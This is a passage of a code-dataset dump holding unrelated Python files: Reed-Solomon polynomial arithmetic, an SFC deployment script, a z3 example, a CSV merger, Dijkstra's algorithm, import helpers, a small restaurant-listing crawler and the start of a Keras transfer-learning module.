If you're doing math over\n some strange field or using non-numbers as coefficients, this class will\n need to be modified.'''\n\n __slots__ = ['length', 'coefficients', 'degree'] # define all properties to save memory (can't add new properties at runtime)\n\n def __init__(self, coefficients=None, keep_zero=False, **sparse):\n '''\n There are three ways to initialize a Polynomial object.\n 1) With a list, tuple, or other iterable, creates a polynomial using\n the items as coefficients in order of decreasing power\n\n 2) With keyword arguments such as for example x3=5, sets the\n coefficient of x^3 to be 5\n\n 3) With no arguments, creates an empty polynomial, equivalent to\n Polynomial([0])\n\n >>> print Polynomial([5, 0, 0, 0, 0, 0])\n 5x^5\n\n >>> print Polynomial(x32=5, x64=8)\n 8x^64 + 5x^32\n\n >>> print Polynomial(x5=5, x9=4, x0=2) \n 4x^9 + 5x^5 + 2\n '''\n if coefficients is not None and sparse:\n raise TypeError(\"Specify coefficients list /or/ keyword terms, not\"\n \" both\")\n if coefficients is not None:\n # Polynomial( [1, 2, 3, ...] )\n #if isinstance(coefficients, tuple): coefficients = list(coefficients)\n # Expunge any leading (unsignificant) 0 coefficients\n if not keep_zero: # for some polynomials we may want to keep all zeros, even the higher insignificant zeros (eg, for the syndrome polynomial, we need to keep all coefficients because the length is a precious info)\n while len(coefficients) > 0 and coefficients[0] == 0:\n coefficients.pop(0)\n if not coefficients:\n coefficients.append(0)\n\n self.coefficients = coefficients\n elif sparse:\n # Polynomial(x32=...)\n powers = list(sparse.keys())\n powers.sort(reverse=1)\n # Not catching possible exceptions from the following line, let\n # them bubble up.\n highest = int(powers[0][1:])\n coefficients = [0] * (highest+1)\n\n for power, coeff in sparse.items():\n power = int(power[1:])\n coefficients[highest - power] = coeff\n\n self.coefficients = coefficients\n else:\n # Polynomial()\n self.coefficients = [0]\n # In any case, compute the degree of the polynomial (=the maximum degree)\n self.length = len(self.coefficients)\n self.degree = self.length-1\n\n def __len__(self):\n '''Returns the number of terms in the polynomial'''\n return self.length\n # return len(self.coefficients)\n\n def get_degree(self, poly=None):\n '''Returns the degree of the polynomial'''\n if not poly:\n return self.degree\n #return len(self.coefficients) - 1\n elif poly and hasattr(\"coefficients\", poly):\n return len(poly.coefficients) - 1\n else:\n while poly and poly[-1] == 0:\n poly.pop() # normalize\n return len(poly)-1\n\n def __add__(self, other):\n diff = len(self) - len(other)\n t1 = [0] * (-diff) + self.coefficients\n t2 = [0] * diff + other.coefficients\n return self.__class__([x+y for x,y in _izip(t1, t2)])\n\n def __neg__(self):\n if self[0].__class__.__name__ == \"GF2int\": # optimization: -GF2int(x) == GF2int(x), so it's useless to do a loop in this case\n return self\n else:\n return self.__class__([-x for x in self.coefficients])\n\n def __sub__(self, other):\n return self + -other\n\n def __mul__(self, other):\n '''Multiply two polynomials (also works over Galois Fields, but it's a general approach). 
Algebraically, multiplying polynomials over a Galois field is equivalent to convolving vectors containing the polynomials' coefficients, where the convolution operation uses arithmetic over the same Galois field (see Matlab's gfconv()).'''\n terms = [0] * (len(self) + len(other))\n\n #l1 = self.degree\n #l2 = other.degree\n l1l2 = self.degree + other.degree\n for i1, c1 in enumerate(self.coefficients):\n if c1 == 0: # log(0) is undefined, skip (and in addition it's a nice optimization)\n continue\n for i2, c2 in enumerate(other.coefficients):\n if c2 == 0: # log(0) is undefined, skip (and in addition it's a nice optimization)\n continue\n else:\n #terms[-((l1-i1)+(l2-i2))-1] += c1*c2 # old way, but not optimized because we recompute l1+l2 everytime\n terms[ -(l1l2-(i1+i2)+1) ] += c1*c2\n return self.__class__(terms)\n\n def mul_at(self, other, k):\n '''Compute the multiplication between two polynomials only at the specified coefficient (this is a lot cheaper than doing the full polynomial multiplication and then extract only the required coefficient)'''\n if k > (self.degree + other.degree) or k > self.degree: return 0 # optimization: if the required coefficient is above the maximum coefficient of the resulting polynomial, we can already predict that and just return 0\n\n term = 0\n\n for i in _range(min(len(self), len(other))):\n coef1 = self.coefficients[-(k-i+1)]\n coef2 = other.coefficients[-(i+1)]\n if coef1 == 0 or coef2 == 0: continue # log(0) is undefined, skip (and in addition it's a nice optimization)\n term += coef1 * coef2\n return term\n\n def scale(self, scalar):\n '''Multiply a polynomial with a scalar'''\n return self.__class__([self.coefficients[i] * scalar for i in _range(len(self))])\n\n def __floordiv__(self, other):\n return divmod(self, other)[0]\n def __mod__(self, other):\n return divmod(self, other)[1]\n def _fastfloordiv(self, other):\n return self._fastdivmod(other)[0]\n def _fastmod(self, other):\n return self._fastdivmod(other)[1]\n def _gffastfloordiv(self, other):\n return self._gffastdivmod(other)[0]\n def _gffastmod(self, other):\n return self._gffastdivmod(other)[1]\n\n def _fastdivmod(dividend, divisor):\n '''Fast polynomial division by using Extended Synthetic Division (aka Horner's method). Also works with non-monic polynomials.\n A nearly exact same code is explained greatly here: http://research.swtch.com/field and you can also check the Wikipedia article and the Khan Academy video.'''\n # Note: for RS encoding, you should supply divisor = mprime (not m, you need the padded message)\n msg_out = list(dividend) # Copy the dividend\n normalizer = divisor[0] # precomputing for performance\n for i in _range(len(dividend)-(len(divisor)-1)):\n msg_out[i] /= normalizer # for general polynomial division (when polynomials are non-monic), the usual way of using synthetic division is to divide the divisor g(x) with its leading coefficient (call it a). In this implementation, this means:we need to compute: coef = msg_out[i] / gen[0]. 
For more infos, see http://en.wikipedia.org/wiki/Synthetic_division\n coef = msg_out[i] # precaching\n if coef != 0: # log(0) is undefined, so we need to avoid that case explicitly (and it's also a good optimization)\n for j in _range(1, len(divisor)): # in synthetic division, we always skip the first coefficient of the divisior, because it's only used to normalize the dividend coefficient\n if divisor[j] != 0: # log(0) is undefined so we need to avoid that case\n msg_out[i + j] += -divisor[j] * coef\n\n # The resulting msg_out contains both the quotient and the remainder, the remainder being the size of the divisor (the remainder has necessarily the same degree as the divisor -- not length but degree == length-1 -- since it's what we couldn't divide from the dividend), so we compute the index where this separation is, and return the quotient and remainder.\n separator = -(len(divisor)-1)\n return Polynomial(msg_out[:separator]), Polynomial(msg_out[separator:]) # return quotient, remainder.\n\n def _gffastdivmod(dividend, divisor):\n '''Fast polynomial division by using Extended Synthetic Division and optimized for GF(2^p) computations (so it is not generic, must be used with GF2int).\n Transposed from the reedsolomon library: https://github.com/tomerfiliba/reedsolomon\n BEWARE: it works only for monic divisor polynomial! (which is always the case with Reed-Solomon's generator polynomials)'''\n\n msg_out = list(dividend) # Copy the dividend list and pad with 0 where the ecc bytes will be computed\n for i in _range(len(dividend)-(len(divisor)-1)):\n coef = msg_out[i] # precaching\n if coef != 0: # log(0) is undefined, so we need to avoid that case explicitly (and it's also a good optimization)\n for j in _range(1, len(divisor)): # in synthetic division, we always skip the first coefficient of the divisior, because it's only used to normalize the dividend coefficient (which is here useless since the divisor, the generator polynomial, is always monic)\n #if divisor[j] != 0: # log(0) is undefined so we need to check that, but it slow things down in fact and it's useless in our case (reed-solomon encoding) since we know that all coefficients in the generator are not 0\n msg_out[i + j] ^= divisor[j] * coef # equivalent to the more mathematically correct (but xoring directly is faster): msg_out[i + j] += -divisor[j] * coef\n # Note: we could speed things up a bit if we could inline the table lookups, but the Polynomial class is generic, it doesn't know anything about the underlying fields and their operators. Good OOP design, bad for performances in Python because of function calls and the optimizations we can't do (such as precomputing gf_exp[divisor]). That's what is done in reedsolo lib, this is one of the reasons it is faster.\n\n # The resulting msg_out contains both the quotient and the remainder, the remainder being the size of the divisor (the remainder has necessarily the same degree as the divisor -- not length but degree == length-1 -- since it's what we couldn't divide from the dividend), so we compute the index where this separation is, and return the quotient and remainder.\n separator = -(len(divisor)-1)\n return Polynomial(msg_out[:separator]), Polynomial(msg_out[separator:]) # return quotient, remainder.\n\n def __divmod__(dividend, divisor):\n '''Implementation of the Polynomial Long Division, without recursion. Polynomial Long Division is very similar to a simple division of integers, see purplemath.com. 
Implementation inspired by the pseudo-code from Rosettacode.org'''\n '''Pseudocode:\n degree(P):\n return the index of the last non-zero element of P;\n if all elements are 0, return -inf\n\n polynomial_long_division(N, D) returns (q, r):\n // N, D, q, r are vectors\n if degree(D) < 0 then error\n if degree(N) >= degree(D) then\n q = 0\n while degree(N) >= degree(D)\n d = D shifted right by (degree(N) - degree(D))\n q[degree(N) - degree(D)] = N(degree(N)) / d(degree(d))\n // by construction, degree(d) = degree(N) of course\n d = d * q[degree(N) - degree(D)]\n N = N - d\n endwhile\n r = N\n else\n q = 0\n r = N\n endif\n return (q, r)\n '''\n class_ = dividend.__class__\n\n # See how many times the highest order term\n # of the divisor can go into the highest order term of the dividend\n\n dividend_power = dividend.degree\n dividend_coefficient = dividend[0]\n\n divisor_power = divisor.degree\n divisor_coefficient = divisor[0]\n\n if divisor_power < 0:\n raise ZeroDivisionError\n elif dividend_power < divisor_power: # Incorrect addendum: or (dividend_power == divisor_power and divisor_coefficient > dividend_coefficient):\n # Doesn't divide at all (divisor is too big), return 0 for the quotient and the entire\n # dividend as the remainder\n quotient = class_()\n remainder = dividend\n else: # dividend_power > divisor_power: # Incorrect addendum: or (dividend_power == divisor_power and divisor_coefficient <= dividend_coefficient) , the divisor is small enough and can divide the dividend\n quotient = class_() # init the quotient array\n # init the remainder to the dividend, and we will divide it sucessively by the quotient major coefficient\n remainder = dividend\n remainder_power = dividend_power\n remainder_coefficient = dividend_coefficient\n quotient_power = remainder_power - divisor_power\n\n # Compute how many times the highest order term in the divisor goes into the dividend\n while quotient_power >= 0 and remainder.coefficients != [0]: # Until there's no remainder left (or the remainder cannot be divided anymore by the divisor)\n quotient_coefficient = remainder_coefficient / divisor_coefficient # in GF256, the division here can be interchanged with multiplication, it doesn't change the result.\n q = class_( [quotient_coefficient] + [0] * quotient_power ) # construct an array with only the quotient major coefficient (we divide the remainder only with the major coeff)\n quotient[quotient_power] = quotient_coefficient # add the coeff to the full quotient. Equivalent to: quotient = quotient + q\n remainder = remainder - q*divisor # divide the remainder with the major coeff quotient multiplied by the divisor, this gives us the new remainder\n remainder_power = remainder.degree # compute the new remainder degree\n remainder_coefficient = remainder[0] # Compute the new remainder coefficient\n quotient_power = remainder_power - divisor_power\n return quotient, remainder\n\n # def __olddivmod__(dividend, divisor):\n # '''Implements polynomial long-division recursively. I know this is\n # horribly inefficient, no need to rub it in. I know it can even throw\n # recursion depth errors on some versions of Python.\n\n # However, not being a math person myself, I implemented this from my\n # memory of how polynomial long division works. It's straightforward and\n # doesn't do anything fancy. 
There's no magic here.\n    #     '''\n    #     class_ = dividend.__class__\n\n    #     # See how many times the highest order term\n    #     # of the divisor can go into the highest order term of the dividend\n\n    #     dividend_power = dividend.degree\n    #     dividend_coefficient = dividend.coefficients[0]\n\n    #     divisor_power = divisor.degree\n    #     divisor_coefficient = divisor.coefficients[0]\n\n    #     quotient_power = dividend_power - divisor_power\n    #     if quotient_power < 0:\n    #         # Doesn't divide at all, return 0 for the quotient and the entire\n    #         # dividend as the remainder\n    #         return class_([0]), dividend\n\n    #     # Compute how many times the highest order term in the divisor goes\n    #     # into the dividend\n    #     quotient_coefficient = dividend_coefficient / divisor_coefficient\n    #     quotient = class_( [quotient_coefficient] + [0] * quotient_power )\n\n    #     remainder = dividend - quotient * divisor\n\n    #     if remainder.coefficients == [0]:\n    #         # Goes in evenly with no remainder, we're done\n    #         return quotient, remainder\n\n    #     # There was a remainder, see how many times the remainder goes into the\n    #     # divisor\n    #     morequotient, remainder = divmod(remainder, divisor)\n    #     return quotient + morequotient, remainder\n\n    def __eq__(self, other):\n        return self.coefficients == other.coefficients\n    def __ne__(self, other):\n        return self.coefficients != other.coefficients\n    def __hash__(self):\n        return hash(tuple(self.coefficients)) # lists are unhashable, so hash an immutable copy of the coefficients\n\n    def __repr__(self):\n        n = self.__class__.__name__\n        return \"%s(%r)\" % (n, self.coefficients)\n    def __str__(self):\n        buf = _StringIO()\n        l = len(self) - 1\n        for i, c in enumerate(self.coefficients):\n            if not c and i > 0:\n                continue\n            power = l - i\n            if c == 1 and power != 0:\n                c = \"\"\n            if power > 1:\n                buf.write(\"%sx^%s\" % (c, power))\n            elif power == 1:\n                buf.write(\"%sx\" % c)\n            else:\n                buf.write(\"%s\" % c)\n            buf.write(\" + \")\n        return buf.getvalue()[:-3]\n\n    def evaluate(self, x):\n        '''Evaluate this polynomial at value x, returning the result (which is the sum of all evaluations at each term).'''\n        # Holds the sum over each term in the polynomial\n        #c = 0\n\n        # Holds the current power of x. This is multiplied by x after each term\n        # in the polynomial is added up. 
Initialized to x^0 = 1\n #p = 1\n\n #for term in self.coefficients[::-1]:\n # c = c + term * p\n # p = p * x\n #return c\n\n # Faster alternative using Horner's Scheme\n y = self[0]\n for i in _range(1, len(self)):\n y = y * x + self.coefficients[i]\n return y\n\n def evaluate_array(self, x):\n '''Simple way of evaluating a polynomial at value x, but here we return both the full array (evaluated at each polynomial position) and the sum'''\n x_gf = self.coefficients[0].__class__(x)\n arr = [self.coefficients[-i]*x_gf**(i-1) for i in _range(len(self), 0, -1)]\n # if x == 1: arr = sum(self.coefficients)\n return arr, sum(arr)\n\n def derive(self):\n '''Compute the formal derivative of the polynomial: sum(i*coeff[i] x^(i-1))'''\n #res = [0] * (len(self)-1) # pre-allocate the list, it will be one item shorter because the constant coefficient (x^0) will be removed\n #for i in _range(2, len(self)+1): # start at 2 to skip the first coeff which is useless since it's a constant (x^0) so we +1, and because we work in reverse (lower coefficients are on the right) so +1 again\n #res[-(i-1)] = (i-1) * self[-i] # self[-i] == coeff[i] and i-1 is the x exponent (eg: x^1, x^2, x^3, etc.)\n #return Polynomial(res)\n\n # One liner way to do it (also a bit faster too)\n #return Polynomial( [(i-1) * self[-i] for i in _range(2, len(self)+1)][::-1] )\n # Another faster version\n L = len(self)-1\n return Polynomial( [(L-i) * self[i] for i in _range(0, len(self)-1)] )\n\n def get_coefficient(self, degree):\n '''Returns the coefficient of the specified term'''\n if degree > self.degree:\n return 0\n else:\n return self.coefficients[-(degree+1)]\n \n def __iter__(self):\n return iter(self.coefficients)\n #for item in self.coefficients:\n #yield item\n\n def __getitem__(self, slice):\n return self.coefficients[slice] # TODO: should return 0 for coefficients higher than the degree (but debugging would be harder...)\n\n def __setitem__(self, key, item):\n '''Set or create a coefficient value, the key being the coefficient order (not the internal list index)'''\n if key < self.length:\n self.coefficients[-key-1] = item\n else:\n self.coefficients = [item] + [0]*(key-self.length) + list(self.coefficients)\n self.length = len(self.coefficients)\n self.degree = self.length-1\n","sub_path":"src/unireedsolomon/polynomial.py","file_name":"polynomial.py","file_ext":"py","file_size_in_byte":20578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"521845627","text":"\n\"\"\"This module will finish the whole SFC deployment operation\"\"\"\n\nimport os\nimport shutil\n\nfrom operation.create import create\nfrom operation.delete import delete\n#from operation.update import update\n\nfrom parse_file.parse_request import jsonparser\nfrom config import abs_dir\n\ndef deploy(template_sfc_file):\n \"\"\"The function executes SFC deployment operation.\n\n :param template_sfc_file: the filename of sfc to be deployed\n \"\"\"\n req = jsonparser(template_sfc_file)\n operation = req.get_sfc_operation()\n sfc_name = req.get_sfc_name()\n if operation == \"create\":\n sfc_file = sfc_name + \".json\"\n shutil.copyfile(abs_dir + \"json/sfc/\"+template_sfc_file, abs_dir + \"json/sfc/\"+sfc_file)\n create(sfc_file)\n\n elif operation == \"delete\":\n sfc_file = sfc_name + \".json\"\n delete(sfc_file)\n os.remove(abs_dir + \"json/sfc/\" + sfc_file)\n for vnfd_description_file in os.listdir(abs_dir + \"json/tacker/vnfd/\"):\n if sfc_name in vnfd_description_file:\n os.remove(abs_dir + 
\"json/tacker/vnfd/\" + vnfd_description_file)\n for vnffgd_description_file in os.listdir(abs_dir + \"json/tacker/vnffgd/\"):\n if sfc_name in vnffgd_description_file:\n os.remove(abs_dir + \"json/tacker/vnffgd/\" + vnffgd_description_file)\n\n else:\n sfc_file = sfc_name + \".json\"\n compare_output_file = compare_file(template_sfc_file, sfc_file)\n update(compare_output_file)\n\n \nif __name__ == '__main__':\n deploy(\"template_sfc.json\")\n","sub_path":"deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"436976870","text":"from z3 import *\n\n# Create 3 integer variables\ndog, cat, mouse = Ints('dog cat mouse')\ns = Solver()\ns.add(dog >= 1, # at least one dog\n cat >= 1, # at least one cat\n mouse >= 1, # at least one mouse\n # we want to buy 100 animals\n dog + cat + mouse == 100,\n # We have 100 dollars (10000 cents):\n # dogs cost 15 dollars (1500 cents), \n # cats cost 1 dollar (100 cents), and \n # mice cost 25 cents \n 1500 * dog + 100 * cat + 25 * mouse == 10000)\n\nprint(s)\n\nprint(s.check())\n\nm = s.model()\n\nprint(\"m:\", m)\n\nprint(\"x = %s\" % m[dog])\n\nprint(\"traversing model...\")\nfor d in m.decls():\n print(\"%s = %s\" % (d.name(), m[d]))\n","sub_path":"SMT-based Model Checking/z3/simpleMath.py","file_name":"simpleMath.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"569503789","text":"import csv\nimport sys\nimport os\n\ndef create_result_csv(root_path):\n queries_result = {}\n queries_list = []\n total_result = []\n\n # read log result\n for dir in os.listdir(root_path):\n if os.path.isdir(os.path.join(root_path, dir)):\n with open(os.path.join(os.path.join(root_path, dir), \"result.csv\"), 'rb') as f:\n csv_read = csv.reader(f)\n total_time_per_round = 0\n for line in csv_read:\n total_time_per_round = total_time_per_round + int(line[1])\n if not queries_result.has_key(line[0]) and line[0] is not \"\":\n if line[2] == \"Success\":\n queries_result[line[0]] = [line[1]]\n else:\n queries_result[line[0]] = [\"-\" + line[1]]\n queries_list.append(line[0])\n else:\n if line[2] == \"Success\":\n queries_result[line[0]].append(line[1])\n else:\n queries_result[line[0]].append(\"-\" + line[1])\n\n total_result.append(total_time_per_round)\n\n # add all results into one file\n final_result_file = os.path.join(root_path, \"final_result.csv\")\n with open(final_result_file,'wb') as f:\n csv_write = csv.writer(f)\n csv_head = [\"query\"]\n csv_tail = [\"total\"]\n for dir in os.listdir(root_path):\n if os.path.isdir(os.path.join(root_path, dir)):\n csv_head.append(dir)\n csv_head.append(\"average\")\n csv_write.writerow(csv_head)\n\n for query in queries_list:\n line = []\n total_time_per_query = 0\n line.append(query)\n for runtime in queries_result.get(query):\n line.append(runtime)\n total_time_per_query = total_time_per_query + abs(int(runtime))\n average_time_per_query = total_time_per_query / (len(line) - 1)\n line.append(average_time_per_query)\n csv_write.writerow(line)\n\n total_time = 0\n for total_time_per_round in total_result:\n csv_tail.append(total_time_per_round)\n total_time = total_time + int(total_time_per_round)\n average_time_per_round = total_time / (len(csv_tail) - 1)\n csv_tail.append(average_time_per_round)\n csv_write.writerow(csv_tail)\n\nif __name__ == '__main__':\n args = sys.argv\n if len(args) < 2:\n exit(1)\n 
result_path = args[1]\n    create_result_csv(result_path)","sub_path":"tools/tpch/tpch_script/tpch/merge_csv_result.py","file_name":"merge_csv_result.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272340266","text":"import heapq\nimport math\ngraph = {'A': {'B':5, 'C':1}, # the graph is represented as a dict\n         'B': {'A':5, 'C':2, 'D':1}, \n         'C': {'A':1, 'B':2, 'D':4, 'E':8}, \n         'D': {'B':1, 'C':4, 'E':3, 'F':6}, \n         'E':{'C':8, 'D':3}, \n         'F':{'D':6}}\n\ndef init_distance(graph, s):\n\tdistance = {s:0}\n\tfor i in graph.keys():\n\t\tif i != s: # compare by value; 'is not' relied on string interning\n\t\t\tdistance[i] = math.inf\n\treturn distance \n\ndef short_path(graph, s):\n\tpqueue = []\n\theapq.heappush(pqueue, (0, s))\n\tparent = {s:None}\n\tdistance = init_distance(graph, s)\n\tseen = []\n\twhile pqueue:\n\t\tdist, vertex = heapq.heappop(pqueue)\n\t\tseen.append(vertex)\n\t\tfor w in graph[vertex].keys():\n\t\t\tif w not in seen:\n\t\t\t\tif dist + graph[vertex][w] < distance[w]:\n\t\t\t\t\tdistance[w] = dist + graph[vertex][w]\n\t\t\t\t\theapq.heappush(pqueue, (dist+graph[vertex][w], w))\n\t\t\t\t\tparent[w] = vertex\n\treturn parent, distance\nparent, distance = short_path(graph, 'A')\n","sub_path":"shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165584698","text":"#Write a Python program that reads the value of a\n#purchase, then computes and displays the purchase value taking the\n#discount into account, as described below:\n#for purchases above R$ 200 the store gives a 20% discount\n#for those below that there is no discount; display the purchase value.\n\ncompra = float(input('Enter the value of your purchase: '))\nif compra > 200:\n    des = compra - (compra * 20 / 100)\n    print('The value of your purchase with a 20% discount is R${}'.format(des))\nelse:\n    print('The value of your purchase was low and gets no discount.')\n","sub_path":"Programação de Computadores/Python Exercicios Resolvidos/aula 5/aula 5/ex01aula05.py","file_name":"ex01aula05.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"81843578","text":"import pkgutil\n\n\ndef import_class(name):\n    import importlib\n    module_name, class_name = name.rsplit(\".\", 1)\n    module = importlib.import_module('.', module_name)\n    return getattr(module, class_name)\n\n\ndef import_model(app_name, name):\n    from django.apps import apps as django_apps\n    if isinstance(name, str):\n        result = None\n        if \".\" in name: # \"hotel.Channel\"\n            result = django_apps.get_model(name)\n        if not result:\n            try:\n                result = django_apps.get_model(app_name, name.lower())\n            except Exception:\n                pass\n        if not result:\n            try:\n                result = import_class(\"%s.models.%s\" % (app_name, name.capitalize()))\n            except Exception:\n                pass\n\n        if result:\n            return result\n    raise Exception(f\"Cannot import model by {app_name} {name}\")\n\n\nclass ModuleProxyCache(dict):\n    def __missing__(self, key):\n        if '.' 
not in key:\n            return __import__(key)\n\n        module_name, class_name = key.rsplit('.', 1)\n\n        module = __import__(module_name, {}, {}, [class_name])\n        handler = getattr(module, class_name)\n\n        # Cache the resolved handler so repeated lookups are cheap\n        self[key] = handler\n\n        return handler\n\n\n_cache = ModuleProxyCache()\n\n\ndef import_string(path):\n    \"\"\"\n    Path must be module.path.ClassName\n\n    >>> cls = import_string('sentry.models.Group')\n    \"\"\"\n    result = _cache[path]\n    return result\n\n\ndef import_submodules(context, root_module, path):\n    \"\"\"\n    Import all submodules and register them in the ``context`` namespace.\n\n    >>> import_submodules(locals(), __name__, __path__)\n    \"\"\"\n    for loader, module_name, is_pkg in pkgutil.walk_packages(path, root_module + '.'):\n        # this causes a Runtime error with model conflicts\n        # module = loader.find_module(module_name).load_module(module_name)\n        module = __import__(module_name, globals(), locals(), ['__name__'])\n        for k, v in vars(module).items():\n            if not k.startswith('_'):\n                context[k] = v\n        context[module_name] = module\n\n\ndef import_sub_classes(context, root_module, path):\n    \"\"\"\n    Import all submodules and register them in the ``context`` namespace.\n\n    >>> import_sub_classes(locals(), __name__, __path__)\n    \"\"\"\n    for loader, module_name, is_pkg in pkgutil.walk_packages(path, root_module + '.'):\n        module = __import__(module_name, globals(), locals(), ['__name__'])\n        for k, v in vars(module).items():\n            is_class = hasattr(v, '__name__')\n            has_module = hasattr(v, \"__module__\")\n            if not k.startswith('_') and is_class and has_module:\n                name = v.__name__\n                if name[0:1].isupper() and v.__module__.startswith(root_module):\n                    context[k] = v\n        context[module_name] = module\n","sub_path":"redmin/utils/imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"199732867","text":"# coding: utf-8\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport re\n\ndef get_url(urls, bs):\n    for link in bs.find_all(name='a'):\n        if len(urls) > 100:\n            break\n        url = link.get('href')\n        match = re.search(r'^/shop/[0-9]*$', str(url))\n        if match:\n            urls.add(match.group())\n\ndef get_info(bs):\n    try:\n        info = bs.find(attrs = {'class': 'basic-info'})\n        name = info.find(attrs = {'class': 'shop-name'}).text.split('\\n')[1]\n        address = ''.join([s.strip(' ') for s in info.find(attrs = {'class': 'expand-info address'}).text.split('\\n')])\n        print(name, address)\n    except Exception:\n        pass\n\ndef main():\n    domain = 'http://www.dianping.com'\n    urls = set(['/shop/1721578', '/shop/14155301', ])\n    while len(urls) > 0:\n        r = requests.get(domain+urls.pop(), headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0'})\n        bs = BeautifulSoup(r.text, 'html.parser')\n        get_url(urls, bs)\n        get_info(bs)\n        time.sleep(4)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"other/crawler_dianping.py","file_name":"crawler_dianping.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"67845913","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# PROGRAMMER: Vittorio Nardone\n# DATE CREATED: 12/13/2018\n# REVISED DATE: <=(Date Revised - if any)\n# PURPOSE: Train a new deep neural network on an image dataset and save\n# the model as a checkpoint.\n# Use a trained network to predict the class for an input image\n# loading 
checkpoint model\n# Pre-trained networks are used (VGG/Densenet/AlexNet/ResNet)\n#\n\nfrom keras import applications\nfrom keras import layers\nfrom keras import models\nfrom keras import optimizers\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.preprocessing import image\nfrom keras import backend as K\n\nfrom collections import OrderedDict\nimport numpy as np\nimport os\nimport json\nfrom time import time, gmtime, strftime\nfrom PIL import Image\n\nimport helper\n\ndef supported_models():\n    ''' Return a list of supported model architectures\n    '''\n    return ['densenet121', 'densenet169', 'densenet201',\n            'vgg16', 'vgg19',\n            'mobilenet',\n            'mobilenetv2',\n            'resnet50',\n            'nasnetmobile']\n\ndef supported_optimizer():\n    ''' Return a list of supported optimizers\n    '''\n    return ['SGD','Adam']\n\ndef gpu_available():\n    ''' Return True if Cuda/GPU is available on current system\n    '''\n    avail = False\n    if len(K.tensorflow_backend._get_available_gpus()) > 0:\n        avail = True\n    return avail\n\ndef get_preprocess_function(arch):\n    \"\"\"\n    Return preprocess function of specified architecture model.\n    \"\"\"\n    if arch == 'mobilenet':\n        pf = applications.mobilenet.preprocess_input\n    elif arch == 'mobilenetv2':\n        pf = applications.mobilenet_v2.preprocess_input\n    elif arch in ['densenet121', 'densenet169', 'densenet201']:\n        pf = applications.densenet.preprocess_input\n    elif arch == 'vgg16':\n        pf = applications.vgg16.preprocess_input\n    elif arch == 'vgg19':\n        pf = applications.vgg19.preprocess_input\n    elif arch == 'resnet50':\n        pf = applications.resnet50.preprocess_input\n    elif arch == 'nasnetmobile':\n        pf = applications.nasnet.preprocess_input\n    else:\n        raise Exception(\"Unknown architecture: {}\".format(arch))\n\n    return pf\n\ndef create_new_model(arch):\n    \"\"\"\n    Create a new pretrained model with specified architecture.\n    Parameters:\n        arch - model architecture\n    Returns:\n        model - the model object\n    \"\"\"\n    # Model definition\n    if arch in supported_models():\n        if arch == 'mobilenet':\n            model = applications.mobilenet.MobileNet(weights='imagenet', include_top=False, input_shape=(224,224,3))\n        elif arch == 'mobilenetv2':\n            model = applications.mobilenet_v2.MobileNetV2(weights='imagenet', include_top=False, input_shape=(224,224,3))\n        elif arch == 'densenet121':\n            model = applications.densenet.DenseNet121(weights='imagenet', include_top=False, input_shape=(224,224,3))\n        elif arch == 'densenet169':\n            model = applications.densenet.DenseNet169(weights='imagenet', include_top=False, input_shape=(224,224,3))\n        elif arch == 'densenet201':\n            model = applications.densenet.DenseNet201(weights='imagenet', include_top=False, input_shape=(224,224,3))\n        elif arch == 'vgg16':\n            model = applications.vgg16.VGG16(weights='imagenet', include_top=False, input_shape=(224,224,3))\n        elif arch == 'vgg19':\n            model = applications.vgg19.VGG19(weights='imagenet', include_top=False, input_shape=(224,224,3))\n        elif arch == 'resnet50':\n            model = applications.resnet50.ResNet50(weights='imagenet', include_top=False, input_shape=(224,224,3))\n        elif arch == 'nasnetmobile':\n            model = applications.nasnet.NASNetMobile(weights='imagenet', include_top=False, input_shape=(224,224,3))\n    else:\n        raise Exception(\"Unknown architecture: {}\".format(arch))\n\n    return model\n\n\ndef create_classifier(base_model, hidden_units, class_count, bn = False, bn_momentum = 0.99):\n    \"\"\"\n    Create classifier according to specified parameters and return a new model.\n    Parameters:\n        base_model - the model object\n        hidden_units - int 
array with number of elements for each hidden layer\n        class_count - number of output layer elements\n    Returns:\n        model\n    \"\"\"\n    input_count = int(base_model.output.shape[-1])\n\n    # Input and output layers\n    hidden_units.insert(0, input_count)\n    hidden_units.append(class_count)\n\n    model = models.Sequential()\n    model.add(base_model)\n    model.add(layers.Flatten())\n\n    iterations = len(hidden_units)\n\n    for idx in range(iterations):\n        if idx < iterations-1:\n            model.add(layers.Dense(hidden_units[idx], activation='relu'))\n            if bn:\n                model.add(layers.BatchNormalization(momentum = bn_momentum))\n        else:\n            model.add(layers.Dense(hidden_units[idx], activation='softmax'))\n\n    return model\n\n\ndef create_optimizer(optimization = 'SGD', learning_rate = 0.05):\n    if optimization == 'SGD':\n        optimizer = optimizers.SGD(lr=learning_rate)\n    elif optimization == 'Adam':\n        optimizer = optimizers.Adam(lr=learning_rate)\n    else:\n        raise Exception(\"Unknown optimization algorithm\")\n    return optimizer\n\ndef create_and_train(data_folder,\n                     training_subfolder = '/train/',\n                     validation_subfolder = '/valid/',\n                     batch_size = 64,\n                     arch = 'densenet121', hidden_units = [], dropout = 0, bn = False,\n                     epochs = 10, learning_rate = 0.05, accuracy = 0.8, optimization = 'SGD',\n                     full_net_epochs = 0):\n    \"\"\"\n    